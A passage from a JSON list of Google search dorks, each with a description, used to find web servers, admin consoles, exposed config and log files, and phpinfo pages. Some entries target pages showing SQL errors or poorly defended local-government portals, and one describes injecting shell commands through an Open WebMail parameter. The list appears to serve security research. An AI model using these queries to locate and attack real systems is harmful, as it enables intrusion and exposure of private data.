attacker can plan an attack with more precision."}, {"dork": "\"MaXX/3.1\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/* server at\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/4.0\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/5.0 server at\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Microsoft-IIS/6.0\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"OmniHTTPd/2.10\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"OpenSA/1.0.4\" intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Red Hat Secure/2.0\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"Red Hat Secure/3.0 server at\"", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "sEDWebserver * server +at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "fitweb-wwws * server at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"httpd+ssl/kttd\" * server at intitle:index.of", "description": "The version of a particular web server can be detected with a simple query like this one. Although the same thing can be accomplished by browsing the web site, this method offers another layer of anonymity. Armed with this information an attacker can plan an attack with more precision."}, {"dork": "\"powered by\" \"shoutstats\" hourly daily", "description": "shoutstats is a fast, free Shoutcast server statistic analysis program. It produces instant and dynamic usage reports in HTML format, for viewing in a standard browser. Shoutstats is a bunch of php scripts and a RRDtool database. It has been written under a Debian GNU/Linux.http://www.glop.org/projects/shoutstatsThis search can be used to find Shoutcast servers."}, {"dork": "intitle:\"Shoutcast Administrator\"", "description": "shoutcast is software for streaming mp3 and such. This search finds the administrator page. It can be used to detect unlisted Shoutcast servers."}, {"dork": "intitle:AnswerBook2 inurl:ab2/ (inurl:8888 | inurl:8889)", "description": "First of all this search indicates solaris machines and second the webservice is vulnerable to a format string attack.Sun's AnswerBook 2 utilizes a third-party web server daemon (dwhttpd) that suffers from a format string vulnerability. The vulnerability can be exploited to cause the web server process to execute arbitrary code. The web server runs as user and group 'daemon' who, under recent installations of Solaris, owns no critical fileshttp://www.securiteam.com/unixfocus/5SP081F80K.htm"}, {"dork": "intitle:\"Lotus Domino Go Webserver:\" \"Tuning your webserver\" -site:ibm.com", "description": "Domino Go Webserver is a scalable high-performance Web server that runs on a broad range of platforms. Domino Go Webserver brings you state-of-the-art security, site indexing capabilities, and advanced server statistics reporting. With Domino Go Webserver, you can speed beyond your competition by exploiting the latest advances in technology, such as Java, HTTP 1.1, and Web site content rating. Get all this and more in a Web server that's easy to install and maintain. --From the Lotus Domino Go Webserver web pag"}, {"dork": "intitle:\"Directory Listing, Index of /*/\"", "description": "Vendor page:\"Einfache HTTP-Server-Software f\u00c3\u0192\u00c6\u2019\u00c3\u201a\u00c2\u00bcr privates Homepage-Hosting oder gro\u00c3\u0192\u00c6\u2019\u00c3\u2026\u00c2\u00b8e Uploads.\"small HTTP server software for private hompage hosting or big uploads."}, {"dork": "intitle:\"error 404\" \"From RFC 2068 \"", "description": "WebLogic Server Process Edition extends the functionality of the Application Server by converging custom app development with powerful Business Process Management (BPM) capabilities to provide an industrial strength, standards-based framework that enables the rapidly assembly of composite services, transforming existing infrastructure to a service oriented architecture-in a manageable phased approach."}, {"dork": "intitle:\"Open WebMail\" \"Open WebMail version (2.20|2.21|2.30) \"", "description": "\"Open WebMail is a webmail system based on the Neomail version 1.14 from Ernie Miller. Open WebMail is designed to manage very large mail folder files in a memory efficient way. It also provides a range of features to help users migrate smoothly from Microsoft Outlook to Open WebMail\". A remote attacker can run arbitrary commands with the web server's privileges by exploiting an unfiltered parameter in userstat.pl. Details Vulnerable Systems: * Open Webmail versions 2.20, 2.21 and 2.30 * Limited exploitation on openwebmail-current.tgz that was released on 2004-04-30 (See below) The vulnerability was discovered in an obsolete script named userstat.pl shipped with Open Webmail. The script doesn't properly filter out shell characters from the loginname parameter. The loginname parameter is used as an argument when executing openwebmail-tool.pl from the vulnerable script. By adding a \";\", \"|\" or \"( )\" followed by the shell command to a http GET, HEAD or POST request an attacker can execute arbitrary system commands as an unprivileged user (the Apache user, \"nobody\" or \"www\", e.g.)."}, {"dork": "\"Switch to table format\" inurl:table|plain", "description": "This is an index page of OReilly WebSite Professional.WebsitePro was developed by O'reily and disconinued on August 2001. The product was then continued by Deerfield.com"}, {"dork": "\"About Mac OS Personal Web Sharing\"", "description": "Mac OS Personal Web Sharing allows Mac OS users to share Folders over the Web.If you open this page you will shown the system's major version as requirement."}, {"dork": "intitle:\"Welcome To Xitami\" -site:xitami.com", "description": "Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)"}, {"dork": "intitle:\"Resin Default Home Page\"", "description": "Resin provides a fast standalone web server. This search locates those servers based on the title of the default page."}, {"dork": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "description": "WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously"}, {"dork": "inurl:2506/jana-admin", "description": "The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter."}, {"dork": "XAMPP \"inurl:xampp/index\"", "description": "XAMPP is an easy to install Apache distribution containing MySQL, PHP and Perl. XAMPP is really very easy to install and to use - just download, extract and start. At the moment there are three XAMPP distributions.-allows you to write emails (mercury Mail)-some phpmyadmin are unprotected-security details of the server-maybe some more things ;-)"}, {"dork": "\"Netware * Home\" inurl:nav.html", "description": "Rather than submitting various searches for all kinds of NetWare related pages, Novell NetWare's Home Page is a good place to start for profiling the services available on a NetWare powered system. The results will often include all (or at least some) of the following links to different services on a system - including Server Certificates, iFolder, iManager, NetStorage, Enterprise Web Server Management and the Web Search Manager!"}, {"dork": "inurl:oraweb -site:oraweb.org", "description": "Oracle administrators tend to naming their servers ora* - maybe because they forget the name of their database all the time.So the Oracle webserver is very often named oraweb."}, {"dork": "intitle:\"welcome to mono xsp\"", "description": "XSD is the demo webserver for the Mono project and allows the execution of ASP.NET on Unix"}, {"dork": "Powered.by.RaidenHTTPD intitle:index.of", "description": "RaidenHTTPD ( http://www.raidenhttpd.com/en ) is a full featured web server software for Windows"}, {"dork": "yaws.*.server.at", "description": "YAWS (http://yaws.hyber.org), Yet Another Web Server, is a HTTP high perfomance 1.1 webserver. Yaws is entirely written in Erlang, furthermore it is a multithreaded webserver where one Erlang light weight process is used to handle each client."}, {"dork": "intitle:\"IPC@CHIP Infopage\"", "description": "web server detection for IPC@chip embedded webserverThe dork uses the webserver's infopage which reveals some very interesting information.See securityfocus advisory for more info: http://www.securityfocus.com/bid/2767"}, {"dork": "intitle:\"Index of *\" mode links bytes last-changed name", "description": "thttpd is is a webserver written in C and should compile and run on most unix-like systems. As of version 2.20 or later, thttpd is known to build and run on the following platforms, usually on at least recent platform versions: * FreeBSD* NetBSD* BSD/OS* Solaris* Tru64 / DIGITAL UNIX / OSF/1* SunOS* Linux* HP-UX* MacOS X* UnixWare* AMIGAOS* NCR MP-RAS BASE 3.02 (EISA/MCA)* Sega Dreamcast* Compaq iPaq 3765* Windows 2000/XP (port of 2.07 only)"}, {"dork": "intitle:\"Welcome to the Advanced Extranet Server, ADVX!\"", "description": "Webserver detection: The Advanced Extranet Server project aims to create an extensible open source web server based on Apache."}, {"dork": "inurl:wl.exe inurl:?SS1= intext:\"Operating system:\" -edu -gov -mil", "description": "List server apparently keeps track of many clients, not just Domains and hardware, but Operating systems as well. As always this information is able to be gained by Zero Packet methods."}, {"dork": "intext:\"Target Multicast Group\" \"beacon\"", "description": "\"... Multicast Beacon is a multicast diagnostic tool written in Perl which uses the RTP protocol (RFC3550) to provide useful statistics and diagnostic information about a given multicast group's connectivity characteristics.Multicast is a way of distributing IP packets to a set of machines which have expressed an interest in receiving them. It is a one-to-many distribution model suitable for video conferencing and other forms of data sharing over the network.\"see h**p://beacon.dast.nlanr.net"}, {"dork": "intitle:\"Apache Status\" | intext:\"Apache Server Status\"", "description": "This dork gives,\nApache Server Status\nServer Version: \nServer Built: \nCurrent Time: \nRestart Time: \nParent Server Generation: \nServer uptime: \n-Xploit"}, {"dork": "inurl:phpsysinfo/index.php?disp=dynamic", "description": "These Dork show a lot of info about servers behind the webpages.\nEnjoy healthy.\nBest Regard.\nRootkit Pentester."}, {"dork": "intitle:\"HFS\" \"Server Uptime\" \"Server time\"", "description": "HttpFileServer with open access\nCategory: Web Server Detection\n@theevilbit - Csaba Fitzl"}, {"dork": "inurl:/php/info.php", "description": "# Google Dork: inurl:/php/info.php\n# Date: 11/25/2016\n# Exploit Author: Cameron Maerz @pwns4cash\n# Version: php\n# Tested on: all\nI noticed a very similar dork in the database, and also have noticed a\ntrend in what hosting companies are suggesting to their customers. Thus:\ninurl:/php/info.php\nThe results returned were different than the similar dork."}, {"dork": "\"PHP Credits\" \"Configuration\" \"PHP Core\" ext:php inurl:info", "description": "Dork: \"PHP Credits\" \"Configuration\" \"PHP Core\" ext:php inurl:info\nAnother way to look Phpinfo()\nGoogle Dork by INILERM"}, {"dork": "inurl:user_guide intext:\"CodeIgniter User Guide\"", "description": "*Explanation: *CodeIgniter comes with a default offline user guide which\nmost of the installed applications don't remove and gets indexed.\n*Google dork: *inurl:user_guide intext:\"CodeIgniter User Guide\"\nThanks\nSreenath Sasikumar"}, {"dork": "ext:svc inurl:wsdl", "description": "this dork will return Web Services Description Language which will expose\nwebservices\nsubmitted by: Mohammad Al-Nasser"}, {"dork": "inurl:/pub/ inurl:_ri_", "description": "*Google dork description: *Servers using Oracle Responsys\n*Google Search:* inurl:/pub/ inurl:_ri_\n*Submitted by:* Alfie"}, {"dork": "inurl:/_catalogs", "description": "*Google dork description: *Identify sharepoint servers\n*Google Search: *inurl:/_catalogs\n*Submitted by:* Alfie"}, {"dork": "inurl:phpmyadmin/themes intext:\"pmahomme\"", "description": "This will help to identify websites that host phpmyadmin by detecting\r\nthe exposed theme files\r\n\r\nVisakh V Nair"}, {"dork": "inurl:readme.md intext:\"Laravel\"", "description": "Reason:Lavavel package comes with readme.md and Since it's a part of\r\ndefault package it get indexed and able to identify the framework using\r\nthis dork which can be further used for exploiting."}, {"dork": "\"Application Blocked!\" \"Google bot\"", "description": "Pages with black list or behind Fortigate firewall.\r\nRegards.\r\nRootkit Pentester."}, {"dork": "inurl:\"server-status\" \"Server Version: Apache/\" \"Server Built: \" \"Server uptime:\" \"Total accesses\" \"CPU Usage:\"", "description": "inurl:\"server-status\" \"Server Version: Apache/\" \"Server Built: \" \"Server uptime:\" \"Total accesses\" \"CPU Usage:\"\r\n\r\nAbove mentioned dork shows URL which has Apache server-status file openly accessible. Apache server status file discloses all the request which are send to server and most of the time it discloses hidden urls or parameter's call."}, {"dork": "\"var miner = new CoinHive\" intext:document.domain", "description": "*Google *dork* description: *sites running the CoinHive crypto miner\r\n\r\n*Google Search:* \"var miner = new CoinHive\" intext:document.domain\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Axis Happiness Page\" \"Examining webapp configuration\"", "description": "Reveals sensitive information including a full path disclosure in Apache Axis \r\n\r\nAlwin Warringa"}, {"dork": "intitle:\"miniProxy\"", "description": "This dork finds this little script: (https://github.com/joshdick/miniProxy).\r\nThis will provide free proxies to use for browsing or, as it is usable with\r\nGET parameters, to use with cURL.\r\n\r\nUse ethically and responsibly.\r\nDork by _palonE"}, {"dork": "inurl:rvsindex.php & /rvsindex.php?/user/login", "description": "*Google* dork *description: *sites running the rvsitebuilder CMS\r\n\r\n*Google Search: inurl:rvsindex.php & /rvsindex.php?/user/login*\r\n\r\n*Submitted by:* Alfie\r\n\r\n*Website: (*https://the-infosec.com*)*"}, {"dork": "intitle:\"Apache2 Debian Default Page: It works\"", "description": "intitle:\"Apache2 Debian Default Page: It works\"\r\n\r\nDefault Apache2 html page\r\n\r\nManhNho"}, {"dork": "intitle:\"apache tomcat/\" + \"Find additional important configuration information in:\"", "description": "intitle:\"apache tomcat/\" + \"Find additional important configuration\r\ninformation in:\"\r\n\r\nApache Tomcat web server detected!!!\r\n\r\nManhNho"}, {"dork": "\"RDServer Product information\" | inurl:\"/rdagent.jsp\"", "description": "\"RDServer Product information\" | inurl:\"/rdagent.jsp\"\r\n\r\nThis dork show RDServer Product information\r\n\r\nManhNho"}, {"dork": "inurl:composer.json codeigniter -site:github.com", "description": "*This can be used to identify the code hosted by different companies that\r\nare created with CodeIgniter PHP framework.*\r\n*Thanks*\r\n*Anwar Ayoob*"}, {"dork": "intitle:\"apache tomcat/\" \"Apache Tomcat examples\"", "description": "This dork show many example of Server Apache Tomcat.\r\n\r\n\r\nKhanhNNVN"}, {"dork": "intitle:HTTP Server Test Page powered by CentOS", "description": "intitle:HTTP Server Test Page powered by CentOS\r\n\r\nCentOS detected\r\n\r\nManhNho"}, {"dork": "inurl:tests/mocks intext:autoloader", "description": "*inurl:tests/mocks intext:autoloader*\r\n\r\nThis will help us identify websites made with codeigniter.\r\n\r\n\r\nThank you\r\nAthira M"}, {"dork": "inurl:/_hcms/", "description": "Google dork *description: * Get all sites using Hubspot's Content Mangement\r\nSystem (CMS)\r\n\r\n*Google Search: *inurl:/_hcms/\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)\r\n\r\n\r\n-- \r\nRegards,\r\nAlfie.\r\nthe-infosec.com"}, {"dork": "intext:\"Powered by Sentora\" -github.com", "description": "Sites using Sentora CMS.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by Nesta\"", "description": "Nesta, a Ruby CMS\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "Coldbox | contentbox | commandbox \"Powered by ContentBox\"", "description": "ContentBox content management tools and CMS.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by Typesetter\"", "description": "Typesetter CMS dorks\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intext:\"Powered by (Quantum | Quantum CMS | CMS)", "description": "Sites using Quantum CMS builder\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "\"This server is operated by OpenX.\"", "description": "Find websites using the OpenX web server software.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"Sucuri WebSite Firewall - Access Denied\"", "description": "intitle:\"Sucuri WebSite Firewall - Access Denied\"\r\n\r\nSucuri Firewall detected\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by phpSQLiteCMS\" | intitle:\"phpSQLiteCMS - A simple & lightweight CMS\"", "description": "phpSQLiteCMS detect\r\n\r\nManhNho"}, {"dork": "intitle:livezilla \"Server Time\"", "description": "intitle:livezilla \"Server Time\"\r\n\r\nDork to locate LiveZilla consoles and version, as well as additional\r\ninformation about the server such as PHP version."}, {"dork": "intitle: \"Welcome to nginx!\" + \"Thank you for using nginx.\"", "description": "nginx detect\r\n\r\nManhNho"}, {"dork": "intext:\"Powered by Abyss Web Server\"", "description": "Machines running Abyss web server.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno\r\n\r\n@brulliant"}, {"dork": "\"Powered by vShare\"", "description": "Find websites that are used to upload files and videos.\r\n\r\n~ CrimsonTorso"}, {"dork": "intitle:Test Page for the Nginx HTTP Server on Fedora", "description": "Web server detected - Happy new year 2019\r\n\r\nManhNho"}, {"dork": "intext:\" - 2019 Cott Systems, Inc.\"", "description": "AUTHOR: FlyingFrog\r\nTwitter: @ItsKarl0z\r\n\r\n\r\n++ Local Government Websites (American) ++\r\n\r\nintext:\" - 2019 Cott Systems, Inc.\"\r\n\r\nCott Systems develops a lot of the local government document\r\nsearch portals in the U.S.\r\n\r\nData you can find:\r\n - Search Portals for:\r\n - Clerk Offices\r\n - Personal Data\r\n - Property Data (Tax, Debt, Deed etc.)\r\n - Internal Search engines\r\n - Foothold in potentially vulnerable .gov Websites\r\n - local government is usually not well funded, their cybersecurity is not very good\r\n chances of finding bugs are very high\r\n\r\n++ 307 results at the time of writing ++\r\n\r\n\r\nDISCLAIMER:\r\nThe vulnerabilities are suggestions, none of them have been tested by me,\r\nalways request permission before testing anything on someone else system.\r\nThis dork is made by myself, I give you permission to share it as you please,\r\nI would appreciate a shoutout !"}, {"dork": "\"I have been invoked by servletToJSP\"", "description": "# Exploit Title: i have been invoked by servletToJSP\r\n# Google Dork: i have been invoked by servletToJSP\r\n# Date: January 12, 2019\r\n# Exploit Author: g.go\r\n# Vender Homepage: g.goog.gogooggo@gmail.com\r\n# Software Link: tomcat.apache.org\r\n# Version: 7-9\r\n# Description: find many improperly set up tomacat servlets\r\n\r\n\r\n#### Google Dork\r\ni have been invoked by servletToJSP"}, {"dork": "\"Proudly created with Wix.com\"", "description": "AUTHOR: FlyingFrog\r\n\r\nTwitter: @ItsKarl0z\r\n\r\n++ Find Websites made with WIX ++\r\n\r\n\"Proudly created with Wix.com\"\r\n\r\n- 13.500.000 results at the time of writing"}, {"dork": "\"Powered by BOINC\"", "description": "Find websites powered by BOINC.\r\n~ CrimsonTorso"}, {"dork": "intitle:\"WAMPSERVER homepage\" \"Server Configuration\" \"Apache Version\"", "description": "Dork for instances of WAMPSERVER homepages.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "inurl:jsmol.php", "description": "Moodle sites using Jsmol."}, {"dork": "intext:\"Powered by GetSimple\" -site:get-simple.info", "description": "This will find sites using the GetSimple CMS."}, {"dork": "inurl:OrganizationChart.cc", "description": "This dork finds all website using ADSelfService and authorizing guest access to the LDAP directory. Access name, mail, mobile number, function...\r\n\r\n# Exploit Title: ADSelfService\r\n# Google Dork: inurl:OrganizationChart.cc\r\n# Date: June 14, 2019\r\n# Exploit Author: mcandberry\r\n# Vendor Homepage: https://www.manageengine.com/"}, {"dork": "intext:\"Brought to you by eVetSites\"", "description": "List of sites all hosted by eVetSites, hosting platform for veterinarians\r\n\r\nZerconil"}, {"dork": "inurl:phpinfo.php intext:build 2600", "description": "finds web servers that have been unmaintained for literal decades.\r\n\r\ninurl:phpinfo.php finds web servers running php and giving system info,\r\n\r\nintext:build 2600 finds XP machines, meaning that you usually get very\r\noutdated PHP and Apache versions."}, {"dork": "inurl:/server-status + \"Server MPM:\"", "description": "inurl:/server-status + \"Server MPM:\"\r\n\r\nApache server-status\r\n\r\nManhNho"}, {"dork": "intitle:\"IIS Windows Server\" -inurl:\"IIS Windows Server\"", "description": "web server detection:\r\nintitle:\"IIS Windows Server\" -inurl:\"IIS Windows Server\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Apache2 Ubuntu Default Page: It works\"", "description": "web server detection:\r\nintitle:\"Apache2 Ubuntu Default Page: It works\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "inurl:\"WebPortal?bankid\"", "description": "#Google Dork: \r\ninurl:\"WebPortal?bankid\u201c\r\n\r\n#Description: \r\nSensitive Information: List of banks in ger hosted by the same hoster\r\n\r\n#Author: \r\nProSec GmbH - Tim Schughart, Matthias Gilles, Christoph Hein"}, {"dork": "inurl:/phpmyadmin/changelog.php -github -gitlab", "description": "Google Dork Description :\r\n\r\n inurl:/phpmyadmin/changelog.php -github -gitlab\r\n\r\nSubmited: 2019-08-29\r\n\r\n# Exploit Title: Phpmyadmin changelog file\r\n# Date: 2019-08-29\r\n# Vendor Homepage: N/A\r\n# Version: any\r\n# Exploit Author: 24Nitin\r\n# Contact: https://www.linkedin.com/in/nitin-kumar-125684166\r\n# Website: https://www.tftus.com/"}, {"dork": "inurl:/iisstart.htm intitle:\"IIS7\"", "description": "Web Server Detection:\r\n\r\ninurl:/iisstart.htm intitle:\"IIS7\"\r\ninurl:/iisstart.htm intitle:\"IIS Windows Server\"\r\nintitle:\"Microsoft Internet Information Services 8\"\r\ninurl:/iisstart.htm intitle:\"IIS Windows\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "site:*/server-status intext:\"Apache server status for\"", "description": "Files containing Juicy info:\r\n\r\nsite:*/server-status intext:\"Apache server status for\"\r\nsite:*/server-info intext:\"Apache server Information\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"index of\" \"server at\"", "description": "Another way to spot Apache web servers in case the service name is hidden.\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "-pub -pool intitle:\"index of\" \"Served by\" \"Web Server\"", "description": "LiteSpeed Webservers\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"index of\" \"Served by Sun-ONE\"", "description": "Sun-ONE web servers\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "intitle:\"Welcome to nginx!\" intext:\"Welcome to nginx on Debian!\" intext:\"Thank you for\"", "description": "Web Server Detection:\r\n\r\nintitle:\"Welcome to nginx!\" intext:\"Welcome to nginx on Debian!\"\r\nintext:\"Thank you for\"\r\n\r\nReza Abasi(Turku)"}, {"dork": "intitle:\"Welcome to JBoss\"", "description": "This dork for JBoss AS entry page even if your JMX console is protected.\r\n*intitle:\"Welcome to JBoss\" *\r\n\r\nPunit Darji (Rapidsafeguard)\r\n(twitter.com/Rapidsafeguard)"}, {"dork": "site:ftp.*.com \"Web File Manager\"", "description": "This google dork searches for \"Rumpus FTP Web File Manager\".\r\n\r\nDork: site:ftp.*.com \"Web File Manager\"\r\n\r\nHarshit Shukla"}, {"dork": "intitle:\"Web Server's Default Page\" intext:\"hosting using Plesk\" -www", "description": "Web Server Detection\r\n\r\n*Ubaid Ahmed*\r\n\r\n*https://UbaidAhmed.com - Life is like riding a\r\nbicycle, you don\u2019t fall off unless you plan to stop peddling*"}, {"dork": "intitle:\"index of\" \"powered by apache \" \"port 80\"", "description": "Google Dork Query to find out insecure Apache Servers running on Port 80.\r\n\r\nGoogle Dork Query: *intitle:\"index of\" \"powered by apache \" \"port 80\"*"}, {"dork": "\"Powered by phpBB\" inurl:\"index.php?s\" OR inurl:\"index.php?style\"", "description": "# Google Dork: \"Powered by phpBB\" inurl:\"index.php?s\" OR\r\ninurl:\"index.php?style\"\r\n\r\n# By using this dork, vulnerable web sites running phpBB can be found.\r\n\r\n# Date: 20/03/2020\r\n\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"This is the default welcome page used to test the correct operation of the Apache2 server\"", "description": "Category: Web Server Detection\r\nNicholas Doropoulos"}, {"dork": "intitle:\"index of\" \"debug.log\" OR \"debug-log\"", "description": "# Google Dork: intitle:\"index of\" \"debug.log\" OR \"debug-log\"\r\n\r\n# Sensitive directories.\r\n\r\n# Date: 22/04/2020\r\n\r\n# Author: Alexandros Pappas"}, {"dork": "intitle:\"index of\" \"docker.yml\"", "description": "Dork: intitle:\"index of\" \"docker.yml\"\r\nDescription: This Google dork lists out docker configuration details stored\r\nin a file named \"docker.yml\" for a drupal cms website.\r\nAuthor: Abhi Chitkara"}, {"dork": "inurl:\":8088/cluster/apps\"", "description": "##################################################################################################################################\r\n# Dork Title: to Find Apache Hadoop\r\n# Google Dork: inurl:\":8088/cluster/apps\"\r\n# Date: 22.05.2020\r\n# Author: Ozer Goker\r\n##################################################################################################################################"}, {"dork": "\"index of /private\" -site:net -site:com -site:org", "description": "# Dork: \"index of /private\" -site:net -site:com -site:org\r\n\r\nThis dork is very very important for indexed information.\r\n\r\nThank you\r\nAshish More"}, {"dork": "inurl:\"id=*\" & intext:\"warning mysql_fetch_array()\"", "description": "Google Dork: inurl:\"id=*\" & intext:\"warning mysql_fetch_array()\"\r\nDescription: List out all pages vulnerable to SQL Injection\r\nAuthor: Krushna Lipane"}, {"dork": "intext:\"index of /\" \"Index of\" access_log", "description": "intext:\"index of /\" \"Index of\" access_log\r\n\r\nBY\r\n\r\nRishabh Chaplot\r\nThank You!\r\n----\r\nRegards,\r\nRishabh Chaplot"}, {"dork": "intitle:\"Microsoft Internet Information Services 8\" -IIS", "description": "Google Dork: intitle:\"Microsoft Internet Information Services 8\" -IIS\r\n\r\nDescription: This dork detects all IIS version 8 servers in search engine.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intitle:\"Monsta ftp\" intext:\"Lock session to IP\"", "description": "# Author:Edwyn Sanders\r\n# Date: 23-08-2020\r\n# Dork: intitle:\"Monsta ftp\" intext:\"Lock session to IP\"\r\n# Description: shows the websites that use the ftp service of the Monsta Ftp company\r\n\r\n\r\nMgter Edwyn Roberto Sanders Rivera\r\nCatedr\u00e1tico\r\nUniversidad Tecnol\u00f3gica de Honduras , UTH"}, {"dork": "intitle:\"Lists Web Service\"", "description": "# Google Dork: intitle:\"Lists Web Service\"\r\n# Exposed SharePoint (Lists Web Service).\r\n# Date: 15/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "allintitle:\"Pi-hole Admin Console\"", "description": "# Google Dork: allintitle:\"Pi-hole Admin Console\"\r\n# Pi-hole Admin Consoles.\r\n# Date: 17/09/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intitle:Snoop Servlet", "description": "# Dork Title: to Find Snoop Servlet\r\n# Google Dork: intitle:Snoop Servlet\r\n# Date: 23.09.2020\r\n# Author: Ozer Goker"}, {"dork": "\"Powered by 123LogAnalyzer\"", "description": "Find Private and/or files containing sensitive or restricted information\r\nvia LogAnalyzer stored on the network.\r\n~ Strontium"}, {"dork": "inurl:_vti_bin/Authentication.asmx", "description": "# Google Dork: inurl:_vti_bin/Authentication.asmx\r\n# Date: 10/11/2020\r\n# Exploit Author: Javier Bernardo\r\n# Homepage: https://www.hack.com.ar\r\n\r\nJavier Bernardo\r\n*Ethical Hacker | Information Security Engineer*\r\nEmail: javierbernardo001@gmail.com"}, {"dork": "allintext:\"Index Of\" \"sftp-config.json\"", "description": "Dear Team,\r\n\r\n# Exploit Title: allintext:\"Index Of\" \"sftp-config.json\"\r\n# Google Dork: allintext:\"Index Of\" \"sftp-config.json\"\r\n# Date: 14/10/2020\r\n# Exploit Author: Sajan Dhakate\r\n\r\nPlease find the attached txt file.\r\n\r\n\r\n*Thanks & Regards*\r\n*Sajan Dhakate*"}, {"dork": "ext:php | intitle:phpinfo \"published by the PHP Group\"", "description": "Author: Rahul Parmar\r\nGoogle Dork: ext:php | intitle:phpinfo \"published by the PHP Group\"\r\nExpose PHPinfo file"}, {"dork": "inurl:/phpPgAdmin/browser.php", "description": "Google Dork: inurl:/phpPgAdmin/browser.php\r\n\r\nDescription: This Google Dork is used for detecting phpPgAdmin PostgreSQL\r\nServers.\r\n\r\nAuthor: Sibi Mathew George"}, {"dork": "intext:\"Healthy\" + \"Product model\" + \" Client IP\" + \"Ethernet\"", "description": "# Google Dork: intext:\"Healthy\" + \"Product model\" + \" Client IP\" + \"Ethernet\"\r\n# Cisco Meraki configuration panels with juicy info...\r\n# Date: 18/11/2020\r\n# Exploit Author: Alexandros Pappas"}, {"dork": "intext:\"SonarQube\" + \"by SonarSource SA.\" + \"LGPL v3\"", "description": "#Google Dork: intext:\"SonarQube\" + \"by SonarSource SA.\" + \"LGPL v3\"\r\n\r\n#Description: viewing various source codes of business applications\r\n\r\n#Author: Paulo Gualter (https://www.linkedin.com/in/paulogualter)"}, {"dork": "inurl:/xprober ext:php", "description": "Google Dork : inurl:/xprober ext:php\r\n\r\nThis will give all the X Prober Server info disclosed- A probe program for\r\nPHP environment\r\n(Sensitive Data Exposure)\r\n\r\nAuthor : Pratik Khalane\r\n\r\nDate : 19/12/2020"}, {"dork": "inurl:\"/phpmyadmin/user_password.php", "description": "Google Dork: inurl:\"/phpmyadmin/user_password.php\r\nDate : 22nd December 2020\r\nImpact : Sensitive Information\r\nAuthor : Mukul Trivedi\r\n\r\n\r\n[image: Screenshot Chrome.jpg]"}, {"dork": "inurl:/config/device/wcd", "description": "# Google Dork: inurl:/config/device/wcd\r\n# Date: 1/11/2020\r\n# Exploit Author: Javier Bernardo\r\n\r\nJavier Bernardo\r\n*Ethical Hacker 